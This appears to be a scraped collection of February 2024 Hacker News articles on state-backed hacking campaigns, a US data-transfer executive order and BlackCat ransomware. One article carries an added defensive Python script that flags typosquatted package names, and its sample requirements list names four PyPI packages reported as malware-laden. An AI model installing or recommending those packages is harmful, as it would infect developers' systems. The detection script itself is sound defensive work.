data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoOsvoEPlyoX-fS2syYNGtZUBYDatyFso4vFhczOLHv2RN26jv1aYHAlfM6N1GnfOWfmbARMQWwiU2gWQ_ckElD6-NNqTYUJaauHWhP4n0AeAyjKIyakYdSVFYoinbYDKsVdIazYQ6Dnz3crRqalSPwYylrYGrPlkmHHnJg1AmMA2iLtjEoGFNZ7EZUl9b/s728-rw-e365/dll.jpg" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" title="PyPI Malware"/></a></div> <p>The notorious North Korean state-backed hacking group Lazarus uploaded four packages to the Python Package Index (PyPI) repository with the goal of infecting developer systems with malware.</p><a name='more'></a> <p>The packages, now taken down, are <a href="https://www.pepy.tech/projects/pycryptoenv" rel="nofollow" target="_blank">pycryptoenv</a>, <a href="https://www.pepy.tech/projects/pycryptoconf" rel="nofollow" target="_blank">pycryptoconf</a>, <a href="https://www.pepy.tech/projects/quasarlib" rel="nofollow" target="_blank">quasarlib</a>, and <a href="https://www.pepy.tech/projects/swapmempool" rel="nofollow" target="_blank">swapmempool</a>. They have been collectively downloaded 3,269 times, with pycryptoconf accounting for the most downloads at 1,351.</p> <p>"The package names pycryptoenv and pycryptoconf are similar to pycrypto, which is a Python package used for encryption algorithms in Python," JPCERT/CC researcher Shusei Tomonaga <a href="https://blogs.jpcert.or.jp/en/2024/02/lazarus_pypi.html" rel="nofollow" target="_blank">said</a>. 
"Therefore, the attacker probably prepared the malware-containing malicious packages to target users' typos in installing Python packages."</p> <p>The disclosure comes days after Phylum <a href="https://thehackernews.com/2024/02/north-korean-hackers-targeting.html" rel="nofollow" target="_blank">uncovered</a> several rogue packages on the npm registry that have been used to single out software developers as part of a campaign codenamed Contagious Interview.</p> <p>An interesting commonality between the two sets of attacks is that the malicious code is concealed within the test script ("test.py"). 
In this case, however, the test file is merely a smokescreen for what's an XOR-encoded DLL file, which, in turn, creates two DLL files named IconCache.db and NTUSER.DAT.</p> <p>The attack sequence then uses NTUSER.DAT to load and execute IconCache.db, a malware called Comebacker that's responsible for establishing connections with a command-and-control (C2) server to fetch and run a Windows executable file.</p> <p>JPCERT/CC said the packages are a continuation of a campaign that Phylum first <a href="https://thehackernews.com/2023/11/beware-developers-blazestealer-malware.html" rel="nofollow" target="_blank">detailed</a> in November 2023 as leveraging crypto-themed npm modules to deliver Comebacker.</p> <p>"Attackers may be targeting users' typos to have the malware downloaded," Tomonaga said. "When you install modules and other kinds of software in your development environment, please do so carefully to avoid installing unwanted packages."</p> <div class="cf note-b">
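<p>One way to act on the advice above before <code>pip install</code> runs, as an added example that is not code from the article, from JPCERT/CC, or from PyPI: screen a requirements list for names that sit within a small edit distance of a well-known package, or that extend a well-known name with a short generic suffix (the <code>pycryptoenv</code> / <code>pycryptoconf</code> versus <code>pycrypto</code> pattern the article describes). The list of "known" packages and the requirements file are constructed samples; in practice the known list would come from an internal mirror's inventory or an allowlist.</p>

```python
"""Typosquat screening for Python dependency names.

Added example, not code from the article, JPCERT/CC or PyPI. Flags names in a
requirements list that are close to, or extend, a well-known package name so a
typo is caught before `pip install` runs.
"""
import re
from typing import Optional

# Constructed sample of well-known distribution names (assumption: in a real
# pipeline this comes from an allowlist or an internal mirror's inventory).
KNOWN_PACKAGES = {
    "pycrypto", "pycryptodome", "requests", "numpy", "urllib3", "cryptography",
}


def normalize(name: str) -> str:
    """PEP 503 normalisation: case-fold and collapse runs of -, _ and . to '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def levenshtein(a: str, b: str) -> int:
    """Edit distance (insert/delete/substitute) via the iterative DP table."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def requirement_name(line: str) -> Optional[str]:
    """Extract the distribution name from one requirements.txt line, or None
    for comments, blank lines, pip options and URL/VCS requirements."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith(("-", "git+", "http")):
        return None
    m = re.match(r"[A-Za-z0-9][A-Za-z0-9._-]*", line)
    return m.group(0) if m else None


def suspicious_neighbours(name: str, known=KNOWN_PACKAGES, max_distance: int = 2):
    """Return (known_name, reason) pairs when `name` looks like a typosquat.

    Two heuristics: a short edit distance to a known name (pycrpto -> pycrypto),
    or a known name used as a prefix with a short suffix bolted on
    (pycryptoenv -> pycrypto). An exact match is the real package: nothing to flag.
    """
    n = normalize(name)
    hits = []
    for k in sorted(known):
        kn = normalize(k)
        if n == kn:
            return []
        d = levenshtein(n, kn)
        if d <= max_distance:
            hits.append((k, f"edit distance {d}"))
        elif n.startswith(kn) and len(n) - len(kn) <= 6:
            hits.append((k, f"extends '{k}' with suffix '{n[len(kn):]}'"))
    return hits


def screen_requirements(text: str):
    """Map each flagged requirement name to the known names it resembles."""
    report = {}
    for line in text.splitlines():
        name = requirement_name(line)
        if name is None:
            continue
        hits = suspicious_neighbours(name)
        if hits:
            report[name] = hits
    return report


if __name__ == "__main__":
    # Constructed requirements file mixing legitimate names with the four
    # package names the article reports.
    SAMPLE = """\
requests==2.31.0
pycryptoenv
pycryptoconf
numpy>=1.26
quasarlib
swapmempool
"""
    for name, hits in screen_requirements(SAMPLE).items():
        for known, reason in hits:
            print(f"{name}: resembles {known} ({reason})")
```

<p>Run against the constructed sample, the two <code>pycrypto*</code> names are flagged as prefix extensions of <code>pycrypto</code>, while <code>quasarlib</code> and <code>swapmempool</code> pass because nothing in the known list resembles them: a name-similarity check catches the typo lure, not every malicious package, so it complements rather than replaces pinned hashes and a vetted internal index.</p>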
</div> </div><br/><b>Source:</b> <a href="https://thehackernews.com/2024/02/lazarus-exploits-typos-to-sneak-pypi.html" rel="nofollow" target="_blank">thehackernews.com</a><br/>Published 2024-02-28T22:21:00.001-08:00 (updated 2024-02-28T22:21:54.958-08:00): Chinese Hackers Exploiting Ivanti VPN Flaws To Deploy New Malware<div class="articlebody clear cf" id="articlebody"><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvBMGRX-FRhy6CYsKZLAVAI-R4Vq-OHFhUpTO_Ky7GF6UcUGzv6Kh0jYNdC5kTLbexZbAJ5ePXVe8uxpWGu0GVnHjUIKIJnONT-dn6y7dSF_2aQonNdE0ZqL9S-u1McXUreNtn-zlj4B6ssalzlcEsOZ-fB-aGbVYsuor2yZxvsD6GAlahvlQ7RT7oyJ0C/s728-rw-e365/china.jpg" rel="nofollow" style="clear: left; display: block; float: left; text-align: center;"><img alt="Ivanti VPN Flaws" border="0" data-original-height="380" data-original-width="728"
data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvBMGRX-FRhy6CYsKZLAVAI-R4Vq-OHFhUpTO_Ky7GF6UcUGzv6Kh0jYNdC5kTLbexZbAJ5ePXVe8uxpWGu0GVnHjUIKIJnONT-dn6y7dSF_2aQonNdE0ZqL9S-u1McXUreNtn-zlj4B6ssalzlcEsOZ-fB-aGbVYsuor2yZxvsD6GAlahvlQ7RT7oyJ0C/s728-rw-e365/china.jpg" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" title="Ivanti VPN Flaws"/></a></div> <p>At least two different suspected China-linked cyber espionage clusters, tracked as <strong>UNC5325</strong> and <strong>UNC3886</strong>, have been attributed to the exploitation of security flaws in Ivanti Connect Secure VPN appliances.</p><a name='more'></a> <p>UNC5325 abused <a href="https://thehackernews.com/2024/02/ivanti-vulnerability-exploited-to.html" rel="nofollow" target="_blank">CVE-2024-21893</a> to deliver a wide range of new malware called LITTLELAMB.WOOLTEA, PITSTOP, PITDOG, PITJET, and PITHOOK, as well as maintain persistent access to compromised appliances, Mandiant said.</p> <p>The Google-owned threat intelligence firm has assessed with moderate confidence that UNC5325 is associated with UNC3886 owing to source code overlaps in LITTLELAMB.WOOLTEA and PITHOOK with malware used by the latter.</p> <p>It's worth pointing out that <a href="https://thehackernews.com/2024/01/chinese-hackers-silently-weaponized.html" rel="nofollow" target="_blank">UNC3886</a> has a track record of leveraging zero-day flaws in Fortinet and VMware solutions to deploy a variety of implants like VIRTUALPITA, VIRTUALPIE, THINCRUST, and CASTLETAP.</p> <p>"UNC3886 has primarily targeted the defense industrial base, technology, and telecommunication organizations located in the U.S. 
and [Asia-Pacific] regions," Mandiant researchers <a href="https://www.mandiant.com/resources/blog/investigating-ivanti-exploitation-persistence" rel="nofollow" target="_blank">said</a>.</p> <p>The active exploitation of CVE-2024-21893 – a server-side request forgery (SSRF) vulnerability in the SAML component of Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti Neurons for ZTA – by UNC5325 is said to have occurred as early as January 19, 2024, targeting a limited number of devices.</p> <p>The attack chain entails combining CVE-2024-21893 with a previously disclosed command injection vulnerability tracked as <a href="https://thehackernews.com/2024/01/chinese-hackers-exploiting-critical-vpn.html" rel="nofollow" target="_blank">CVE-2024-21887</a> to gain unauthorized access to susceptible appliances, ultimately leading to the deployment of a new version of <a href="https://thehackernews.com/2024/02/warning-new-malware-emerges-in-attacks.html" rel="nofollow" target="_blank">BUSHWALK</a>.</p> <p>Some instances have also involved the misuse of legitimate Ivanti components, such as SparkGateway plugins, to drop additional payloads. 
This includes the PITFUEL plugin to load a malicious shared object codenamed LITTLELAMB.WOOLTEA, which comes with capabilities to persist across system upgrade events, patches, and factory resets.</p> <p>It further acts as a backdoor that supports command execution, file management, shell creation, SOCKS proxy, and network traffic tunneling.</p> <p>Also observed is another malicious SparkGateway plugin, dubbed PITDOG, that injects a shared object known as PITHOOK in order to persistently execute an implant referred to as PITSTOP, which is designed for shell command execution, file write, and file read on the compromised appliance.</p> <div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdF5UYUeT4OUUQQwOw_OnFHrPHzn4G1M1-7XurDDpBTx0SqGnI7cnbY2UXtPUoy_-o_MCL_9PXeROyr4PAPdrINayu3ssEnyoWELO8H3VO7OoCDEqbs62TbxC-f8j2t8GiRXL0KWuAVFqClVgC1MTFcXbq3iQCr8AqYhD6xxZXyLxmDGI51hyphenhyphenICuq-haQ9/s728-rw-e365/malware.jpg" rel="nofollow"><img alt="Ivanti VPN Flaws" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdF5UYUeT4OUUQQwOw_OnFHrPHzn4G1M1-7XurDDpBTx0SqGnI7cnbY2UXtPUoy_-o_MCL_9PXeROyr4PAPdrINayu3ssEnyoWELO8H3VO7OoCDEqbs62TbxC-f8j2t8GiRXL0KWuAVFqClVgC1MTFcXbq3iQCr8AqYhD6xxZXyLxmDGI51hyphenhyphenICuq-haQ9/s728-rw-e365/malware.jpg" title="Ivanti VPN Flaws"/></a></div> <p>Mandiant described the threat actor as having demonstrated a "nuanced understanding of the appliance and their ability to subvert detection throughout this campaign" and using living-off-the-land (LotL) techniques to fly under the radar.</p> <p>The cybersecurity firm said it expects "UNC5325 as well as other China-nexus espionage actors to continue to leverage zero day vulnerabilities on network edge devices as well as appliance-specific malware to gain and maintain access to target environments."</p> <h3>Links Found Between Volt Typhoon and UTA0178</h3> <p>The disclosure comes as industrial cybersecurity company Dragos <a href="https://hub.dragos.com/report/voltzite-espionage-operations-targeting-u.s.-critical-systems" rel="nofollow" target="_blank">attributed</a> reconnaissance and enumeration activities aimed at multiple U.S.-based electric companies, emergency services, telecommunication providers, defense industrial bases, and satellite services to China-sponsored <a href="https://thehackernews.com/2024/02/chinese-hackers-operate-undetected-in.html" rel="nofollow" target="_blank">Volt Typhoon</a> (aka Voltzite).</p> <p>"Voltzite's actions towards U.S. electric entities, telecommunications, and GIS systems signify clear objectives to identify vulnerabilities within the country's critical infrastructure that can be exploited in the future with destructive or disruptive cyber attacks," it said.</p> <p>Volt Typhoon's victimology footprint has since expanded to include African electric transmission and distribution providers, with evidence connecting the adversary to <a href="https://thehackernews.com/2024/01/chinese-hackers-exploit-zero-day-flaws.html" rel="nofollow" target="_blank">UTA0178</a>, a threat activity group linked to the zero-day exploitation of Ivanti Connect Secure flaws in early December 2023.</p> <div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDTW6JmmiI1KT0YeXN6gO7aQEycdm2xSAjNZduJDHixuYrCP3JMSBy5LBLFk11816rdqHIf5ctHL5N22R8K4nW182-Z4vGrd2d7E3mbIAhZ3hqIf-Qs8ZyPUpGP5VTKCNM4fXhzTOzYoQ6mJBNbfN6fwqdOsG-Fin2qmAKwORSVcFwtJQ6L-mE9dkU62iG/s728-rw-e365/dragos.jpg" rel="nofollow"><img alt="Ivanti VPN Flaws" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDTW6JmmiI1KT0YeXN6gO7aQEycdm2xSAjNZduJDHixuYrCP3JMSBy5LBLFk11816rdqHIf5ctHL5N22R8K4nW182-Z4vGrd2d7E3mbIAhZ3hqIf-Qs8ZyPUpGP5VTKCNM4fXhzTOzYoQ6mJBNbfN6fwqdOsG-Fin2qmAKwORSVcFwtJQ6L-mE9dkU62iG/s728-rw-e365/dragos.jpg" title="Ivanti VPN Flaws"/></a></div> <p>The cyber espionage actor, which relies heavily on LotL methods to sidestep detection, <a href="https://www.dragos.com/blog/industry-news/2023-ot-cybersecurity-year-in-review-now-available/" rel="nofollow" target="_blank">joins</a> two other new groups, namely Gananite and Laurionite, that came to light in 2023, conducting long-term reconnaissance and intellectual property theft operations targeting critical infrastructure and government entities.</p> <p>"Voltzite uses very minimal tooling and prefers to conduct their operations with as little a footprint as possible," Dragos explained. "Voltzite heavily focuses on detection evasion and long-term persistent access with the assessed intent of long-term espionage and data exfiltration."</p> <div class="cf note-b">Found this article interesting? Follow us on <a href="https://twitter.com/thehackersnews" rel="nofollow" target="_blank">Twitter <i class="icon-font icon-twitter"></i></a> and <a href="https://www.linkedin.com/company/thehackernews/" rel="nofollow" target="_blank">LinkedIn</a> to read more exclusive content we post.</div> </div><br/><b>Source:</b> <a href="https://thehackernews.com/2024/02/chinese-hackers-exploiting-ivanti-vpn.html" rel="nofollow" target="_blank">thehackernews.com</a> 2024-02-28T21:07:00.001-08:00 President Biden Blocks Mass Transfer Of Personal Data To High-Risk Nations<div class="articlebody clear cf" id="articlebody"><div class="separator" style="clear: both;"><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh75SVYsJUnIvLV3cnEXA8YpDKxfGHi5-9CWoMh2ojBwAQwZQVOcHd2M4xlNZaFMVCPfV7t9daLqJ4JfKYZpT82aFZcLOu8Laki1XRfVjCcmzhZI9ChxHQv-LSzvCIr5aWSmRwhXL2GngFaQD-fp6E2QkGmiW8NlMQrY1IyyhF0LnVYd-hZt-xGmdKia5vf/s728-rw-e365/bb.jpg" rel="nofollow"><img alt="President Biden" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh75SVYsJUnIvLV3cnEXA8YpDKxfGHi5-9CWoMh2ojBwAQwZQVOcHd2M4xlNZaFMVCPfV7t9daLqJ4JfKYZpT82aFZcLOu8Laki1XRfVjCcmzhZI9ChxHQv-LSzvCIr5aWSmRwhXL2GngFaQD-fp6E2QkGmiW8NlMQrY1IyyhF0LnVYd-hZt-xGmdKia5vf/s728-rw-e365/bb.jpg" title="President Biden"/></a></div> <p>U.S. President Joe Biden has <a href="https://www.whitehouse.gov/briefing-room/statements-releases/2024/02/28/fact-sheet-president-biden-issues-sweeping-executive-order-to-protect-americans-sensitive-personal-data/" rel="nofollow" target="_blank">issued</a> an Executive Order that prohibits the mass transfer of citizens' personal data to countries of concern.</p> <p>The Executive Order also "provides safeguards around other activities that can give those countries access to Americans' sensitive data," the White House said in a statement.</p> <p>This includes sensitive information such as genomic data, biometric data, personal health data, geolocation data, financial data, and certain kinds of personally identifiable information (PII).</p> <p>The U.S. government said threat actors could weaponize this information to track U.S. citizens and pass it to <a href="https://thehackernews.com/2024/01/ftc-bans-inmarket-for-selling-precise.html" rel="nofollow" target="_blank">data brokers</a> and foreign intelligence services, after which it can be used for intrusive surveillance, scams, blackmail, and other violations of privacy.</p> <p>"Commercial data brokers and other companies can sell this data to countries of concern, or entities controlled by those countries, and it can land in the hands of foreign intelligence services, militaries, or companies controlled by foreign governments," the government said.</p> <p>In November 2023, researchers at Duke University <a href="https://techpolicy.sanford.duke.edu/data-brokers-and-the-sale-of-data-on-us-military-personnel/" rel="nofollow" target="_blank">revealed</a> that it's trivial to "obtain sensitive data about active-duty members of the military, their families, and veterans, including non-public, individually identified, and sensitive data, such as health data, financial data, and information about religious practices" from data brokers for as little as $0.12 per record.</p> <p>Stating that the sale of such data poses privacy, counterintelligence, blackmail, and national security risks, the report added that hostile nations could collect personal information on activists, journalists, dissidents, and marginalized communities with the goal of restricting freedom of expression and curbing dissent.</p> <p>The government said the countries of concern have a "track record of collecting and misusing data on Americans." According to the <a href="https://www.justice.gov/opa/pr/justice-department-implement-groundbreaking-executive-order-addressing-national-security" rel="nofollow" target="_blank">U.S. Justice Department</a>, the countries that fall under this category include China, Russia, Iran, North Korea, Cuba, and Venezuela.</p> <p>The Executive Order directs federal agencies to issue regulations that establish clear protections for sensitive personal and government-related data from access and exploitation, as well as set high security standards to limit data access via commercial agreements.</p> <p>Additionally, the order requires the Departments of Health and Human Services, Defense, and Veterans Affairs to ensure that federal grants, contracts, and awards are not misused to facilitate access to sensitive data.</p> <p>"The Administration's decision to limit personal data flows only to a handful of countries of concern, like China, is a mistake," Senator Ron Wyden <a href="https://www.wyden.senate.gov/news/press-releases/wyden-statement-on-data-export-executive-order" rel="nofollow" target="_blank">said</a> in a statement, adding that the argument that the U.S. government cannot be banned from buying Americans' data is no longer valid.</p> <p>"Authoritarian dictatorships like Saudi Arabia and U.A.E. cannot be trusted with Americans' personal data, both because they will likely use it to undermine U.S. national security and target U.S.-based dissidents, but also because these countries lack effective privacy laws necessary to stop the data from being sold onwards to China."</p> <p>The latest attempt to regulate the data broker industry comes as the U.S. <a href="https://www.state.gov/the-united-states-adds-sandvine-to-the-entity-list-for-enabling-human-rights-abuses/" rel="nofollow" target="_blank">added</a> China's Chengdu Beizhan Electronics and Canadian network intelligence firm Sandvine to its <a href="https://www.federalregister.gov/documents/2024/02/27/2024-03674/additions-of-entities-revisions-of-entries-and-removal-of-an-entity-from-the-entity-list" rel="nofollow" target="_blank">Entity List</a> after the latter's middleboxes were found to be used to <a href="https://thehackernews.com/2023/09/latest-apple-zero-days-used-to-hack.html" rel="nofollow" target="_blank">deliver spyware</a> targeting a former Egyptian member of parliament last year.</p> <p>A report from Bloomberg in September 2023 also <a href="https://www.bloomberg.com/news/articles/2023-09-26/tech-firm-sandvine-tied-to-hack-of-egyptian-politician-s-iphone" rel="nofollow" target="_blank">found</a> that Sandvine's equipment had been used by governments in Egypt and Belarus to censor content on the internet.</p> <p>Access Now <a href="https://www.accessnow.org/press-release/us-blocklists-sandvine-for-digital-repression-in-egypt/" rel="nofollow" target="_blank">said</a> Sandvine's internet-blocking technologies <a href="https://www.wired.com/story/sandvine-us-sanctions-egypt-internet-censorship/" rel="nofollow" target="_blank">facilitated human rights violations</a> by repressive governments around the world, including in Azerbaijan, Jordan, Russia, Turkey, and the U.A.E., noting it played a "direct role" in shutting down the internet in Belarus in 2020.</p> <p>"Sandvine supplies deep packet inspection tools, which have been used in mass web-monitoring and censorship to block news as well as in targeting political actors and human rights activists," the U.S. Department of State said, explaining its rationale behind adding the company to the trade restriction list. "This technology has been misused to inject commercial spyware into the devices of perceived critics and dissidents."</p> </div><br/><b>Source:</b> <a href="https://thehackernews.com/2024/02/president-biden-blocks-mass-transfer-of.html" rel="nofollow" target="_blank">thehackernews.com</a> 2024-02-28T07:48:00.001-08:00 Iran-Linked UNC1549 Hackers Target Middle East Aerospace & Defense Sectors<div class="articlebody clear cf" id="articlebody"><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyM2fQmAkxwXDbY_FZ3WHltIkGL1RPRI1Df0uekz1o1On2MqgES81RUs9umL32ThRp23WlZEzSmO0vIVhZ4cLPmLRXjmpKSlWL0H5ucUq1Ry1FuY9rK0YkPs502G9d1RFHTa1kH6TrastdeYFDYorTQ0fCnemeiOK982ZiSufjy6dqctqiR9VDoC_vE2xi/s728-rw-e365/cyberattack.jpg" rel="nofollow"><img alt="Aerospace &amp; Defense Sectors" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyM2fQmAkxwXDbY_FZ3WHltIkGL1RPRI1Df0uekz1o1On2MqgES81RUs9umL32ThRp23WlZEzSmO0vIVhZ4cLPmLRXjmpKSlWL0H5ucUq1Ry1FuY9rK0YkPs502G9d1RFHTa1kH6TrastdeYFDYorTQ0fCnemeiOK982ZiSufjy6dqctqiR9VDoC_vE2xi/s728-rw-e365/cyberattack.jpg" title="Aerospace &amp; Defense Sectors"/></a></div> <p>An Iran-nexus threat actor known as <strong>UNC1549</strong> has been attributed with medium confidence to a new set of attacks targeting the aerospace, aviation, and defense industries in the Middle East, including Israel and the U.A.E.</p> <p>Other targets of the cyber espionage activity likely include Turkey, India, and Albania, Google-owned Mandiant said in a new analysis.</p> <p>UNC1549 is said to overlap with <a href="https://thehackernews.com/2022/06/microsoft-seizes-41-domains-used-in.html" rel="nofollow" target="_blank">Smoke Sandstorm</a> (previously Bohrium) and <a href="https://thehackernews.com/2023/10/iranian-group-tortoiseshell-launches.html" rel="nofollow" target="_blank">Crimson Sandstorm</a> (previously Curium), the latter of which is an Islamic Revolutionary Guard Corps (IRGC)-affiliated group that is also known as Imperial Kitten, TA456, Tortoiseshell, and Yellow Liderc.</p> <p>"This suspected UNC1549 activity has been active since at least June 2022 and is still ongoing as of February 2024," the company <a href="https://www.mandiant.com/resources/blog/suspected-iranian-unc1549-targets-israel-middle-east" rel="nofollow" target="_blank">said</a>. "While regional in nature and focused mostly in the Middle East, the targeting includes entities operating worldwide."</p> <p>The attacks entail the use of Microsoft Azure cloud infrastructure for command-and-control (C2) and social engineering involving job-related lures to deliver two backdoors dubbed MINIBIKE and MINIBUS.</p> <p>The spear-phishing emails are designed to disseminate links to fake websites containing <a href="https://www.cyfirma.com/outofband/iran-contributes-to-the-escalating-geo-political-threat-landscape/" rel="nofollow" target="_blank">Israel-Hamas related content</a> or phony job offers, resulting in the deployment of a malicious payload. Also observed are bogus login pages mimicking major companies to harvest credentials.</p> <p>The custom backdoors, upon establishing C2 access, act as a conduit for intelligence collection and for further access into the targeted network. Another tool deployed at this stage is tunneling software called LIGHTRAIL that communicates using Azure cloud infrastructure.</p> <p>While MINIBIKE is written in C++ and capable of file exfiltration, file upload, and command execution, MINIBUS serves as a more "robust successor" with enhanced reconnaissance features.</p> <p>"The intelligence collected on these entities is of relevance to strategic Iranian interests and may be leveraged for espionage as well as kinetic operations," Mandiant said.</p> <p>"The evasion methods deployed in this campaign, namely the tailored job-themed lures combined with the use of cloud infrastructure for C2, may make it challenging for network defenders to prevent, detect, and mitigate this activity."</p> <p>CrowdStrike, in its <a href="https://www.crowdstrike.com/blog/crowdstrike-2024-global-threat-report/" rel="nofollow" target="_blank">Global Threat Report</a> for 2024, described how "faketivists associated with Iranian state-nexus adversaries and hacktivists branding themselves as 'pro-Palestinian' focused on targeting critical infrastructure, Israeli aerial projectile warning systems, and activity intended for information operation purposes in 2023."</p> <p>This includes Banished Kitten, which unleashed the <a href="https://thehackernews.com/2023/11/new-bibi-windows-wiper-targets-windows.html" rel="nofollow" target="_blank">BiBi wiper malware</a>, and Vengeful Kitten, an alias for <a href="https://thehackernews.com/2023/01/researchers-uncover-connection-bw-moses.html" rel="nofollow" target="_blank">Moses Staff</a> that has claimed data-wiping activity against more than 20 companies' industrial control systems (ICS) in Israel.</p> <p>That said, Hamas-linked adversaries have been noticeably absent from <a href="https://thehackernews.com/2024/02/iran-and-hezbollah-hackers-launch.html" rel="nofollow" target="_blank">conflict-related activity</a>, something the cybersecurity firm has attributed to likely power and internet disruptions in the region.</p> </div><br/><b>Source:</b> <a href="https://thehackernews.com/2024/02/iran-linked-unc1549-hackers-target.html" rel="nofollow" target="_blank">thehackernews.com</a> 2024-02-28T05:44:00.001-08:00 FBI Warns U.S. 
Healthcare Sector Of Targeted BlackCat Ransomware Attacks<div style="clear: right; float: right; position: relative; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYLlh2RhlSoVcfl4JFUtr6GOFeLTAm1rHXy9nVAh6sJatf_F3jALEUdaMXW3mNCBfcXMtp3KvkOnaIuedAUmkGqMmZZ58mnrOVeM6n65HKsF2LnRScdHfPRpY7aKOo4-U8EEbx8FzHvO4/s1600/h91.png" imageanchor="1" rel="nofollow"><img border="0" height="2" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYLlh2RhlSoVcfl4JFUtr6GOFeLTAm1rHXy9nVAh6sJatf_F3jALEUdaMXW3mNCBfcXMtp3KvkOnaIuedAUmkGqMmZZ58mnrOVeM6n65HKsF2LnRScdHfPRpY7aKOo4-U8EEbx8FzHvO4/s1600/h91.png" width="2"/></a></div><div class="articlebody clear cf" id="articlebody"><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiukNpThGmmz9-8zmRGUTKJL6gtlyhpbhwRefdGHdH66jQQgaMHEKbIfpLQ7K5XFOhVL5CzKc9KcuYQP_UEu7iU2UQRpUvD1ogEMqMWwEbmuxzXM-CkWUNQX461hhQzhSt6ebjLiiiqq0Bilwh8KZ9KGZXyHZpb2KuCcqhYAdsw4zG8ur70ONEkbgYQTANE/s728-rw-e365/hacker.jpg" rel="nofollow" style="clear: left; display: block; float: left; text-align: center;"><img alt="BlackCat Ransomware Attacks" border="0" data-original-height="380" data-original-width="728" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiukNpThGmmz9-8zmRGUTKJL6gtlyhpbhwRefdGHdH66jQQgaMHEKbIfpLQ7K5XFOhVL5CzKc9KcuYQP_UEu7iU2UQRpUvD1ogEMqMWwEbmuxzXM-CkWUNQX461hhQzhSt6ebjLiiiqq0Bilwh8KZ9KGZXyHZpb2KuCcqhYAdsw4zG8ur70ONEkbgYQTANE/s728-rw-e365/hacker.jpg" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" title="BlackCat Ransomware Attacks"/></a></div> <p>The U.S. 
government is warning about the resurgence of BlackCat (aka ALPHV) ransomware attacks targeting the healthcare sector as recently as this month.</p><a name='more'></a> <p>"Since mid-December 2023, of the nearly 70 leaked victims, the healthcare sector has been the most commonly victimized," the government <a href="https://www.cisa.gov/news-events/alerts/2024/02/27/cisa-fbi-and-hhs-release-update-stopransomware-advisory-alphv-blackcat" rel="nofollow" target="_blank">said</a> in an updated advisory.</p> <p>"This is likely in response to the ALPHV/BlackCat administrator's post encouraging its affiliates to target hospitals after operational action against the group and its infrastructure in early December 2023."</p> <p>The advisory comes from the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Health and Human Services (HHS).</p> <p>The BlackCat ransomware operation suffered a major blow late last year after a coordinated law enforcement operation led to the <a href="https://thehackernews.com/2023/12/fbi-takes-down-blackcat-ransomware.html" rel="nofollow" target="_blank">seizure of its dark leak sites</a>. But the takedown turned out to be a failure after the group managed to regain control of the sites and switched to a new TOR data leak portal that continues to remain active to date.</p> <p>It has also ramped up against critical infrastructure organizations in recent weeks, having claimed responsibility for attacks on Prudential Financial, LoanDepot, Trans-Northern Pipelines, and UnitedHealth Group subsidiary <a href="https://www.sec.gov/Archives/edgar/data/731766/000073176624000045/unh-20240221.htm" rel="nofollow" target="_blank">Optum</a>.</p> <p>The development has prompted the U.S. 
government to <a href="https://thehackernews.com/2024/02/cisa-warning-akira-ransomware.html" rel="nofollow" target="_blank">announce</a> financial rewards of up to $15 million for information leading to the identification of key members as well as affiliates of the e-crime group.</p> <div class="check_two clear bobbob"><center class="cf"><a href="https://thehackernews.uk/delinea728" rel="nofollow" target="_blank" title="Cybersecurity"><img alt="Cybersecurity" class="lazyload" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNFl0XFULXGgKLO8peSzZVqzrRFLL1K51a-m-G6uIJ_5KYJF3VkmlD8kLYYJbfF9RDGmWvinkoGe_YUnOdYnQoIe-rq2bEJ7Gcm7UjAHe3AsXed7FIGQcL6ecVaPInWYtwYQpmod0QvcVtoXiPtzDLzwVlBCSjBTOcP_4ZdpH-ExGJTcUGzTwR8BvCuBoD/s728-rw-e365/delinea728.jpg" height="90" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" width="727"/></a></center></div> <p>BlackCat's ransomware spree <a href="https://thehackernews.com/2024/02/lockbit-ransomware-group-resurfaces.html" rel="nofollow" target="_blank">coincides</a> with the return of LockBit after similar disruption efforts led by the U.K. 
